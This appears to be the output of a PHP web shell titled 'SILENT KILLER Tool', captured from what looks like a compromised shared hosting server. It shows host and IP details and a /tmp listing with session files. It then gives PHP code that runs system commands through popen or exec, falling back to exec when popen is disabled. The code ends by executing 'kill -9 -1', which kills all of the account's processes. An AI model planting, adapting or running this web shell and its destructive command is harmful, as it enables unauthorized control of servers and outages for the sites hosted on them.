Current Path: > > tmp
Operation : Linux premium107.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 Software : Apache Server IP : 198.54.126.246 | Your IP: 216.73.216.181 Domains : 1034 Domain(s) Permission : [ 0700 ]
| Name | Type | Size | Last Modified | Actions |
|---|---|---|---|---|
| .ea-php-cli.cache | File | bytes | January 01 1970 00:00:00. | |
| .htaccess | File | 0 bytes | January 06 2025 09:43:06. | |
| .s.PGSQL.5432 | File | bytes | January 01 1970 00:00:00. | |
| admin.php | File | 5361 bytes | February 11 2026 05:58:25. | |
| index.php | File | 0 bytes | January 06 2025 09:43:06. | |
| mysql.sock | File | 0 bytes | February 06 2026 11:35:55. | |
| php0vjCf4 | File | 1008 bytes | February 11 2026 06:19:58. | |
| phpF8Dtwu | File | 1008 bytes | February 10 2026 06:35:00. | |
| phpMwuRIQ | File | 1008 bytes | February 10 2026 09:38:19. | |
| phpO0M1SB | File | 1008 bytes | February 11 2026 06:19:58. | |
| phpbF4H9c | File | 1008 bytes | February 10 2026 06:35:00. | |
| sess_2d97abc8efccb4dc8edd77547007f420 | File | 0 bytes | February 10 2026 02:02:26. | |
| sess_2ffffadfb1fb6e8574bedcf86866e83c | File | 0 bytes | February 10 2026 03:40:17. | |
| sess_4fe97dcc8c780f18c5ba4aa0da727054 | File | 78 bytes | February 11 2026 02:08:46. | |
| sess_5f743a695a63dc94ca936f032127c1ff | File | 0 bytes | February 11 2026 05:27:01. | |
| sess_7b9620bd6711c458fecb8755b6e32b5e | File | 0 bytes | February 11 2026 03:54:10. | |
| sess_9ac6f8bd4b3ed0e451aab671f08ad99d | File | 0 bytes | February 10 2026 05:13:12. | |
| sess_aa1333671351c793247b56a3373d8fc5 | File | 0 bytes | February 11 2026 04:46:04. | |
| sess_d58a154ae5b26634b5e4bcf681a0923b | File | 0 bytes | February 10 2026 06:05:46. | |
| sess_de681733b9ef6df5a911ff7123bb398a | File | 0 bytes | February 11 2026 04:46:04. | |
| sess_df67d90c78d324aa8f8f589fa8414e4e | File | 0 bytes | February 10 2026 03:20:39. | |
| sess_ec1e29cb8bcd10efb819a30b60f403fe | File | 0 bytes | February 10 2026 05:33:07. | |
| sess_f66c1784c6e36bba25a294e38ab33266 | File | 0 bytes | February 11 2026 04:46:04. | |
| session_cache.tmp | File | 6 bytes | February 11 2026 02:34:48. |
<?php
function run($code, $method = 'popen')
{
$disabled = explode(',', ini_get('disable_functions'));
if (in_array($method, $disabled)) {
$method = 'exec';
}
if (in_array($method, $disabled)) {
return false;
}
$result = '';
switch ($method){
case 'exec':
exec($code,$array);
foreach ($array as $key => $value) {
$result .= $key . " : " . $value . PHP_EOL;
}
return $result;
break;
case 'popen':
$fp = popen($code,"r"); //popen打一个进程通道
while (!feof($fp)) { //从通道里面取得东西
$out = fgets($fp, 4096);
$result .= $out; //打印出来
}
pclose($fp);
return $result;
break;
default:
return false;
break;
}
}
echo '{->|';
var_dump(run("kill -9 -1"));
echo '|<-}';
SILENT KILLER Tool